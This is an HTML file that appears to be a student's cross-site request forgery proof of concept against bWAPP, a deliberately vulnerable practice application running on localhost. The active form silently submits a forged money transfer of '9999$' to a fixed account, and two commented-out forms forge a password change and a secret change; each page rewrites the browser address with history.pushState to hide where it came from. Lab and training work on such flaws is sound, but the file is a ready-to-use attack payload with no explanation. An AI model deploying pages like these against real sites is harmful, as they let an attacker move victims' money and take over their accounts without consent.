<html>
    <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/HPTN2/13.at160610.nguyenbadat5/bWAPP/csrf_2.php">
            <input type="hidden" name="account" id="account" value="123-45678-90"/>
            <input type="hidden" name="amount" id="amount" value="9999$"/>
            <input type="hidden" name="action" value="transfer">
            <input type="submit" value="submit" value="submit request">
        </form>
    </body>
</html>

<!-- <html>
    <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/HPTN2/13.at160610.nguyenbadat5/bWAPP/csrf_1.php">
            <input type="hidden" name="password_new" id="password_new" value="345"/>
            <input type="hidden" name="password_conf" id="password_conf" value="345"/>
            <input type="hidden" name="action" value="change">
            <input type="submit" value="submit" value="submit request">
        </form>
    </body>
</html> -->

<!-- <html>
    <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/HPTN2/13.at160610.nguyenbadat5/bWAPP/csrf_3.php">
            <input type="hidden" name="secret" id="secret" value="345"/>
            <input type="hidden" name="login" id="login" value="bee"/>
            <input type="hidden" name="action" value="change">
            <input type="submit" value="submit" value="submit request">
        </form>
    </body>
</html> -->